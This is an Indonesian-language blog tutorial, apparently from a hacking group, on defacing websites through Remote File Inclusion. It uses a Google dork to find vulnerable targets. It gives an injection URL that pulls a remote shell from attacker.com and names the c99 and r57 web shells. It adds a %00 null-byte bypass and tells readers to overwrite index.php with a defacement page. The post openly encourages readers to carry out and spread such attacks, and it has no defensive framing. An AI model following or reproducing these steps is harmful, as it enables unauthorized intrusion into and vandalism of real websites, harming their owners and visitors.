Tutorial Deface POC Remote File Inclusion (RFI)


CilacapCyber - menurut wikipedia Remote File Inclusion (RFI) adalah teknik yang memungkinkan penyerang untuk mengunggah file atau kode berbahaya di situs web atau server. Kerentanan mengeksploitasi jenis pemeriksaan validasi yang berbeda dan dapat menyebabkan eksekusi kode pada server atau kode di situs web. Kali ini, Mimin akan menulis tutorial sederhana tentang penyertaan file jarak jauh dan pada akhir tutorial :D, mimin kira sobat akan tahu apa itu semua dan mungkin dapat menyebarkan serangan.

nah sobat, RFI adalah kerentanan umum. Perlu sobat ingat bahwa semua peretasan situs web tidak persis tentang injeksi SQL ya. Menggunakan RFI sobat dapat merusak situs web secara terus menerus, mendapatkan akses ke server dan hampir memainkan semua hal dengan server. Mengapa itu memberi tanda merah ke situs web, karena sobat hanya perlu memiliki akal sehat dan pengetahuan dasar PHP untuk mengeksekusi kode berbahaya. perlu sobat ingat bash mungkin berguna karena sebagian besar server saat ini di-host di Linux oke :D.

JADI, BAGAIMANA SOBAT CARA MERETAS SITUS WEB ATAU SERVER DENGAN RFI?

Pertama-tama sobat perlu mencari situs web RFI yang rentan. Mari sobat lihat bagaimana mimin dapat menemukannya.
Seperti yang sobat ketahui menemukan kerentanan adalah langkah pertama untuk meretas situs web atau server. Jadi, mari sobat mulai dan hanya pergi ke Google dan mencari kueri berikut.

sobat ketikan saja  digoogle (  inurl: "index.php? page = home" )

Di tempat home, Sobat juga dapat mencoba beberapa halaman lain seperti produk, galeri,dan lain-lain. Jika sobat sudah tahu situs web rentan RFI, maka sobat tidak perlu menemukannya melalui Google. Setelah mimin menemukannya, mari sobat lanjutkan ke langkah berikutnya. Mari sobat lihat mimin memiliki situs web RFI berikut yang rentan.

contohnya : ( http://target.com/index.php?page=home )

Seperti yang sobat lihat, situs web ini menarik dokumen yang disimpan dalam format teks dari server dan menjadikannya sebagai halaman web. Sekarang sobat bisa menggunakan fungsi include PHP untuk menarik mereka keluar. Mari sobat lihat cara kerjanya dibawah ini.

contoh : ( http://target.com/index.php?page=http://attacker.com/maliciousScript.txt )

Mimin telah menyertakan URL txt kode berbahaya saya di tempat asal. Sobat dapat menggunakan shell apa pun untuk maliciousScript seperti c99, r57 atau lainnya.

Sekarang sobat, jika itu adalah situs web yang benar-benar rentan, maka akan ada 3 hal yang bisa terjadi.

1. Sobat mungkin telah memperhatikan bahwa url terdiri dari "halaman = Home" tidak memiliki ekstensi, tetapi mimin telah menyertakan ekstensi di URL mimin, maka situs tersebut mungkin memberikan kesalahan seperti "menyertakan maliciousScript.txt", ini mungkin terjadi sebagai situs dapat secara otomatis menambahkan ekstensi .txt ke halaman yang disimpan di server.

2. Dalam hal ini, secara otomatis menambahkan sesuatu di baris .php maka sobat harus menggunakan byte nol '% 00' untuk menghindari kesalahan.

3. Eksekusi yang sukses sobat.

Ketika sobat berhasil melaksanakan kode, sobat pergi dengan shell. Sekarang sobat akan menelusuri shell untuk index.php. Dan akan mengganti file dengan halaman deface sobat,

Note : waspadai sobat gunakan Mesin Virtual dan pindai pada VirusTotal sebelum mengunduh program apa pun di Mesin Host untuk privasi sobat.

Semoga bermanfaat, Apabila ada kesalahan dalam artikel mimin silakan berkomentar atau hubungi mimin di contact Us 🙏

CILACAP CYBER TEAM

Hallo Saya Froxsy, Asal jateng saya suka membaca dan menulis

Post a Comment

Previous Post Next Post